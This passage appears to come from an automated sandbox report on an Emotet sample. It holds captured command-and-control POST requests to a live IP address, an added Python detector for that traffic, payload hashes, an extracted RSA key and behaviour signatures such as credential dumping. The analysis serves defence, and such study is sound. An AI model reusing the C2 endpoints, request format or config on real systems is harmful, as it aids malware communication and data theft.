User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache

pw8IEGwt=iZJEaG2FShWGPuAbyLnX2RV%2B8YLKG0BANanz2hXBUSUcz0vaPOWpolM5BjqOnrlNkAHKoe7IqM7JZ3wUPet%2BSq4rZ9jGrTtVjZrud%2BtG3m%2FlcaqPhHThTSwDjSPqrLWMi4VXk96i9ZvrKnw7nKKisz9wjlqVXLsde3dwms3EPSfMtQilE10Ce8ZuMpV5k1Voqoi%2FwyQ55j3%2Fz49PmELK6G7v%2FTlpXICeG9%2FU0k9rWoA4tucZ5IDMRU6Niyrx6PCo5YP%2BGyoMfH1FImr66fLDmcWHcgmE6At3ICNYPZNZIugBJFCniMu7CECVTeDqWMva0iBpxCBNkgTSrJv01%2BCLyf8wmVdFXGCxZY6Il4eH3SwwhCyK%2FyiNe%2B9MFS9Or8h6AKO%2Fb0BCFeP8CocfesZrplaqUTM2Iiydc%2BKivVuksrr69UiA
http://91.83.93.105:8080/forced/prov/health/
POST /forced/prov/health/ HTTP/1.1
Referer: http://91.83.93.105/forced/prov/health/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 449
Connection: Keep-Alive
Cache-Control: no-cache

OCzdr9ZvyG=vOQD90Zt8yMPoMvzaiJ7XzzH7sUufzxX%2FWqYnhci8albiwSHOnvzpdKKA8ZhA42wewohEzvK17pcgoHRBgtdwQtxylxYQ8gzPWucTgUVWoHIH5oKGwj3XNx7yduoy2sFImltamtTwYP7uhyEANp1FZvpSvaxlFSWNntShVbB4S9DYArJTpnXPjgt5arQeYckZKl%2BzBilgL25jQq8FDvXk5QElm1o9KFqz0yW9%2FaCtDNuO%2FYeXqAHh2eIpS2MQFrRqY6rR0vzXr7ZCkbCbvjUQhtBU%2FIutJAmVCXe%2FjDUaT2SPJVA2fMdFzDuB%2FkGfRo5oPHeXyD1n72Qzq1qJ2qW8p46L%2B8D023D4pFF0h3y0PDsESXL%2Bya7p%2FS8pA6TjpGspjj09jzhNpdjjDhvVWdoiv%2FC0%2Bc%3D
http://91.83.93.105:8080/srvc/xian/
POST /srvc/xian/ HTTP/1.1
Referer: http://91.83.93.105/srvc/xian/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 460
Connection: Keep-Alive
Cache-Control: no-cache

lbJZyVfkaKTzL=DwGQmfyGrCTWiR71pbYIgc8JL2PWgX1omR1cMXH0WHxo%2FRvu%2BPaR4Z79%2FcOBX1JNgZEcqZcCu5ympUN1vWrSMn7ILeCpr%2FyUMwnQHaOcJLkafOor1bWc6fEvtVVKA4U%2BImltamtTwYP7uhyEANp1FZvpSvaxlFSWNntShVbB4S9DYArJTpnXPjgt5arQeYckZKl%2BzBilgL25jQq8FDvXk5QElm1o9KFqz0yW9%2FaCtDNuO%2FYeXqAHh2eIpS2MQFrRqY6rR0vzXr7ZCkbCbvjUQhtBU%2FIutJAmVCXe%2FjDUaT2SPJVA2fMdFzDuB%2FkGfRo5oPHeXyD1n72Qzq1qJ2qW8p46L%2B8D023D4pFF0h3y0PDsESXL%2Bya7p%2FS8pA6TjpGspjj09jzhNpdjjDhvVWdoiv%2FC0%2Bc%3D
http://91.83.93.105:8080/entries/
POST /entries/ HTTP/1.1
Referer: http://91.83.93.105/entries/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 445
Connection: Keep-Alive
Cache-Control: no-cache

OabE=bj1TDBwjuxn75iuU7hiJIVCk7jkZDV%2Bj8erLGYW0jiJGkZChQwSd5DofCXzd6kPd%2Fiz6jDpcg8Wg8XTru5D0WrH6YhiVgfdRGY9CaQSFiYXhDkDwTb8kHxS85CdjduuDImltamtTwYP7uhyEANp1FZvpSvaxlFSWNntShVbB4S9DYArJTpnXPjgt5arQeYckZKl%2BzBilgL25jQq8FDvXk5QElm1o9KFqz0yW9%2FaCtDNuO%2FYeXqAHh2eIpS2MQFrRqY6rR0vzXr7ZCkbCbvjUQhtBU%2FIutJAmVCXe%2FjDUaT2SPJVA2fMdFzDuB%2FkGfRo5oPHeXyD1n72Qzq1qJ2qW8p46L%2B8D023D4pFF0h3y0PDsESXL%2Bya7p%2FS8pA6TjpGspjj09jzhNpdjjDhvVWdoiv%2FC0%2Bc%3D
http://91.83.93.105:8080/chunk/between/odbc/
POST /chunk/between/odbc/ HTTP/1.1
Referer: http://91.83.93.105/chunk/between/odbc/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 461
Connection: Keep-Alive
Cache-Control: no-cache

AKAjVMmVTHHh1qqlOQ=UdL%2BTlxQwuJFFw6%2F%2BViWavRDLYulf4IFKCFVhK4cys6hcdxNTPeTMIapdpxRXl7404RTCJPS3SD7EWA9JeFNWq0zMSSBosVHp92LtPOzoVv6W4UcqnNVIgfoQEnWsyR0ImltamtTwYP7uhyEANp1FZvpSvaxlFSWNntShVbB4S9DYArJTpnXPjgt5arQeYckZKl%2BzBilgL25jQq8FDvXk5QElm1o9KFqz0yW9%2FaCtDNuO%2FYeXqAHh2eIpS2MQFrRqY6rR0vzXr7ZCkbCbvjUQhtBU%2FIutJAmVCXe%2FjDUaT2SPJVA2fMdFzDuB%2FkGfRo5oPHeXyD1n72Qzq1qJ2qW8p46L%2B8D023D4pFF0h3y0PDsESXL%2Bya7p%2FS8pA6TjpGspjj09jzhNpdjjDhvVWdoiv%2FC0%2Bc%3D
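The thirteen POSTs above share one shape: a POST to a bare IP on a non-standard port, a Referer naming the same IP without the port, the same MSIE 7.0 user-agent with Cache-Control: no-cache, and a body of exactly one randomly named form field carrying a URL-encoded base64 blob of roughly 440 to 480 bytes. The following added example (not CAPE's code) turns those traits into a scoring function and runs it over the first request from this report and a constructed benign form post. Each trait alone is weak (plenty of internal tools POST to IP addresses), so the verdict requires three of the four; the threshold and the indicator names are this example's own.

```python
import re
from urllib.parse import unquote, urlsplit

# Sample 1: the /taskbar/ request copied from the report above.
EMOTET_REQUEST = (
    "POST /taskbar/ HTTP/1.1\r\n"
    "Referer: http://91.83.93.105/taskbar/\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "DNT: 1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\r\n"
    "Host: 91.83.93.105:8080\r\n"
    "Content-Length: 445\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "7DBo=sphwcXxaf%2Bc9ykO4nd7nkJAMQhfUSAWSiilMN%2FSTPTS8BMN9bART4TSbqAAyRh%2FTBFbFQo2hvDOeTrYHWbK"
    "%2FJsbC1nvzEUtUSzCdFs1RjZEMGWtHytM9p%2BcGTrYrMgt43Y8dZVth6MfTeKkz7CUGI1eadIvs4Xhtn4%2Bg%2FbVVQrA3U9dOUk3V"
    "AzYz8XnxGTN9sjdqcHnC6sF67zBgDXJFkq67CwPSgKtpYV6Z4ytYrR9Hef7xQv1d7ZL5Oku91nggQKlYzSPjre1TsVyPGybNPiCbl"
    "LIQNV6bSzMu62WK7kbZT1ivYovejx4d"
    "%2Bn53tehTraz4%2Bu7m%2Fdzp%2B%2Fvsn4jVcXmrkSsnZn4h1GWMflJOZW1uoiTSycG%2Btr6SzrrVq3ykJY0Emn9Z1gNcLLkTkBast2q1TXA%3D"
)

# Sample 2: a constructed, ordinary login form post for contrast.
BENIGN_REQUEST = (
    "POST /login HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Referer: https://www.example.com/login\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=alice&password=hunter2"
)

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
FORM_BODY = re.compile(r"^[A-Za-z0-9]{4,24}=([A-Za-z0-9%]+)$")   # one field, alnum name
B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body


def emotet_c2_score(raw):
    """Return the list of indicator names this request matches."""
    method, _path, headers, body = parse_request(raw)
    hits = []
    host, _, port = headers.get("host", "").partition(":")
    if method == "POST" and IPV4.match(host):
        hits.append("post-to-bare-ip")
    ref = urlsplit(headers.get("referer", ""))
    # Host carries an explicit non-80 port but the Referer for the same address does not.
    if ref.hostname == host and port and port != "80" and ref.port is None:
        hits.append("referer-drops-port")
    if "MSIE 7.0" in headers.get("user-agent", "") and headers.get("cache-control", "").lower() == "no-cache":
        hits.append("msie7-no-cache")
    m = FORM_BODY.match(body)
    # Alphabet check only; strict base64 decoding would also need a length check.
    if m and len(m.group(1)) > 300 and B64_ALPHABET.match(unquote(m.group(1))):
        hits.append("single-random-field-base64-blob")
    return hits


def is_emotet_like(raw, threshold=3):
    return len(emotet_c2_score(raw)) >= threshold


if __name__ == "__main__":
    for label, req in (("report", EMOTET_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, emotet_c2_score(req), is_emotet_like(req))
```

The body field name changes per request (7DBo, Ewd8IZSd3gtI15D3, haxKGtOdb, ...), so matching on the shape of the body rather than on a fixed name is what keeps the rule stable across the thirteen requests; the blob itself is encrypted and cannot be decoded without the key, so nothing here tries to.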

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

Source Destination ICMP Type Data
94.183.71.206 192.168.35.21 3
94.183.71.206 192.168.35.21 3
94.183.71.206 192.168.35.21 3

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Suricata extracted files

No Suricata extracted files.

JA3

No JA3 hashes found.

File name prepmspterm.exe
Associated Filenames
C:\Windows\SysWOW64\prepmspterm.exe
File Size 624643 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0efd85b3915d9618f91979e65e520478
SHA1 e70ff18b0f850df07c81c168437f78d51c679625
SHA256 a1d4243b1e2380d5fc9d26ea036bd00c39f09cdcdfc1a3d2b699b5fc15cf29a0
CRC32 E6EF58FC
Ssdeep 6144:89b9SO5dVdRQ/vqkg1gEagdQHiQSzPgAJ76KkWv:8fBV7uikFgCShJkQ
ClamAV None
Yara None matched
CAPE Yara None matched
Type Emotet Config
RSA public key
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB
KZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0
h4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB
-----END PUBLIC KEY-----
address
Type Emotet Payload
Size 67584 bytes
Process ygg9ytft62s5ip.exe
PID 1988
Path C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
MD5 418af9878987cb3e32083b33b997d9dc
SHA1 4c2db48623445507cba1335447ff7bbd916a4d07
SHA256 ca367e63b58342f83f59aaa16830059e30800a8539fb4c8ece5d4ccbb10237aa
CRC32 931C1AEA
Ssdeep 1536:XpEHGXHswgKUokPaPfkM8Mf7hBGz0A4Ya6F+neV+:5zHsAUokS8u7h8IA4Yd0
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Type Emotet Payload
Size 75264 bytes
Process ygg9ytft62s5ip.exe
PID 1356
Path C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
MD5 8667bf3fc2c166053d67d83b1d28fdf7
SHA1 9ff69774e71a250d6cc1eb61a46ee89fa0dbf7f3
SHA256 41f6357a855a8adfaabe45cbebfd568be9d4748563e0dae8cc2ce2148dd17f99
CRC32 F8672902
Ssdeep 1536:BpEHGXHswgKUokPaPfkM8Mf7hBGz0A4Ya6F+neVtg:PzHsAUokS8u7h8IA4YdHg
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Process Name ygg9ytft62s5ip.exe
PID 1988
Dump Size 42496 bytes
Module Path C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
Type PE image: 32-bit executable
MD5 381da858b27fe5bf320f8d12b30414e4
SHA1 d043a46344f1a51007476bbd8585a4f4ee9d7646
SHA256 0de8ce40afd78690231ecf795f6feacdc3e8bbf621266f8254a4490acf298805
CRC32 EB3F65F1
Ssdeep 768:hU4ykhbQ0Voa9Qz4mh6yfQmMrtF1w93LNso/k9Z2jrMUUzPKnqvOXV:hbykplQz4QnSv1w93eo/8g8zGmOXV
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 0de8ce40afd78690231ecf795f6feacdc3e8bbf621266f8254a4490acf298805
Process Name prepmspterm.exe
PID 2344
Dump Size 42496 bytes
Module Path C:\Windows\SysWOW64\prepmspterm.exe
Type PE image: 32-bit executable
MD5 cc41aa765857f699268bd7b12ca9be06
SHA1 c67d7a1e5291c625a787d2fdfbf49ca507f92170
SHA256 7bcbc252aa1a3e461adbadffe0ea1d7d3bed7b1abdbc5cc26d600e84a7783f73
CRC32 47DD1AC7
Ssdeep 768:hU4ykhbQ0Voa9Qz4mh6yfQmMrtF1w93LNso/k9Z2jrMUUzPKnqvOJ:hbykplQz4QnSv1w93eo/8g8zGmOJ
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 7bcbc252aa1a3e461adbadffe0ea1d7d3bed7b1abdbc5cc26d600e84a7783f73
Process Name ygg9ytft62s5ip.exe
PID 1356
Dump Size 42496 bytes
Module Path C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
Type PE image: 32-bit executable
MD5 b306d5080bc507cbea1bd969734d6685
SHA1 b4e0e9df4571bfb4baf9165ac1b408d6b26060d1
SHA256 26890b6fefb4f23dfd123873adc17c0251a50de7ca30a3e80df90d1c5c62e51b
CRC32 A201655B
Ssdeep 768:hU4ykhbQ0Voa9Qz4mh6yfQmMrtF1w93LNso/k9Z2jrMUUzPKnqvO9:hbykplQz4QnSv1w93eo/8g8zGmO9
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 26890b6fefb4f23dfd123873adc17c0251a50de7ca30a3e80df90d1c5c62e51b
Process Name prepmspterm.exe
PID 2732
Dump Size 42496 bytes
Module Path C:\Windows\SysWOW64\prepmspterm.exe
Type PE image: 32-bit executable
MD5 0cbf37c565f8cbfcc17e6f4464953113
SHA1 4e528bfa2353b9758684ad09ba8c1384a6e64fa5
SHA256 bc2503cb313e08dca0028780869b76356e1bf09139f4f8f3678785b85020f90e
CRC32 3481039B
Ssdeep 768:hU4ykhbQ0Voa9Qz4mh6yfQmMrtF1w93LNso/k9Z2jrMUUzPKnqvOl:hbykplQz4QnSv1w93eo/8g8zGmOl
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename bc2503cb313e08dca0028780869b76356e1bf09139f4f8f3678785b85020f90e
Process Name svchost.exe
PID 884
Dump Size 26112 bytes
Module Path C:\Windows\sysnative\svchost.exe
Type PE image: 64-bit executable
MD5 bcc3e3e1a277f2daad03e57a5e9304b2
SHA1 59734694a9aab0e2b85b7746379e82d9ed26920e
SHA256 ecf52578f007d1ec7a943b1049983e6b32235204e3753ff4a2a087239c9b4fc9
CRC32 40BCE0D7
Ssdeep 384:OZvvWkXZVq+1t5TYGaVeAYMq1n+Rfk4ue//wCE/lWPWSsEsj45RCOvoji3PKW9CU:uWkX7q+f5TYvVeZMmn+0C4x/EbvKoPK
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename ecf52578f007d1ec7a943b1049983e6b32235204e3753ff4a2a087239c9b4fc9
Process Name WerFault.exe
PID 2680
Dump Size 415232 bytes
Module Path C:\Windows\sysnative\WerFault.exe
Type PE image: 64-bit executable
MD5 d3e6c586e13bee5122e6a90c078d6e13
SHA1 62078820be31f0dd7918ce774f11a6ec7f03e5c6
SHA256 b6b5a0675e75ee828dd9817580519c4344fb743bc8e8184a63505b217943089b
CRC32 445B6480
Ssdeep 6144:UZSOXavF7/ANUwEnfD1Dk8+pOxwov5J5+5CqS7tIN/VxHQgVJyB60OHyLC7v:Gqv5ANUleJpOxn5eDSmN9xHVc2Hyw
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename b6b5a0675e75ee828dd9817580519c4344fb743bc8e8184a63505b217943089b

Processing ( 9.644 seconds )

  • 5.699 BehaviorAnalysis
  • 1.83 CAPE
  • 0.724 ProcDump
  • 0.444 Static
  • 0.333 Dropped
  • 0.333 TargetInfo
  • 0.109 TrID
  • 0.062 Deduplicate
  • 0.062 Strings
  • 0.042 NetworkAnalysis
  • 0.005 AnalysisInfo
  • 0.001 Debug

Signatures ( 2.824 seconds )

  • 0.371 antidbg_windows
  • 0.284 lsass_credential_dumping
  • 0.26 injection_createremotethread
  • 0.25 Doppelganging
  • 0.242 InjectionCreateRemoteThread
  • 0.197 injection_runpe
  • 0.195 InjectionProcessHollowing
  • 0.173 InjectionInterProcess
  • 0.169 decoy_document
  • 0.157 NewtWire Behavior
  • 0.157 api_spamming
  • 0.132 injection_explorer
  • 0.033 antiav_detectreg
  • 0.02 antivm_vbox_window
  • 0.016 antisandbox_script_timer
  • 0.013 infostealer_ftp
  • 0.008 antivm_generic_disk
  • 0.008 infostealer_im
  • 0.008 ransomware_files
  • 0.007 mimics_filetime
  • 0.007 antianalysis_detectreg
  • 0.006 antiav_detectfile
  • 0.006 infostealer_mail
  • 0.005 bootkit
  • 0.005 stealth_file
  • 0.005 reads_self
  • 0.005 virus
  • 0.004 antivm_generic_scsi
  • 0.004 infostealer_bitcoin
  • 0.003 antidebug_guardpages
  • 0.003 exploit_heapspray
  • 0.003 antiemu_wine_func
  • 0.003 dynamic_function_loading
  • 0.003 persistence_autorun
  • 0.003 vawtrak_behavior
  • 0.003 hancitor_behavior
  • 0.003 antivm_vbox_keys
  • 0.003 ransomware_extensions
  • 0.002 malicious_dynamic_function_loading
  • 0.002 antiav_avast_libs
  • 0.002 recon_programs
  • 0.002 antivm_generic_services
  • 0.002 process_interest
  • 0.002 betabot_behavior
  • 0.002 kibex_behavior
  • 0.002 shifu_behavior
  • 0.002 infostealer_browser_password
  • 0.002 kovter_behavior
  • 0.002 antianalysis_detectfile
  • 0.002 antivm_vbox_files
  • 0.002 antivm_vmware_keys
  • 0.002 geodo_banking_trojan
  • 0.002 browser_security
  • 0.002 recon_fingerprint
  • 0.001 tinba_behavior
  • 0.001 uac_bypass_eventvwr
  • 0.001 hawkeye_behavior
  • 0.001 antivm_vbox_libs
  • 0.001 rat_nanocore
  • 0.001 stack_pivot
  • 0.001 exploit_getbasekerneladdress
  • 0.001 exploit_gethaldispatchtable
  • 0.001 antisandbox_sunbelt_libs
  • 0.001 cerber_behavior
  • 0.001 process_needed
  • 0.001 antivm_generic_diskreg
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vpc_keys
  • 0.001 antivm_xen_keys
  • 0.001 modify_proxy
  • 0.001 darkcomet_regkeys
  • 0.001 disables_browser_warn

Reporting ( 0.027 seconds )

  • 0.021 SubmitCAPE
  • 0.006 CompressResults
Task ID 94398
Mongo ID 5d9e82f5c3c009112d67d1a1
Cuckoo release 1.3-CAPE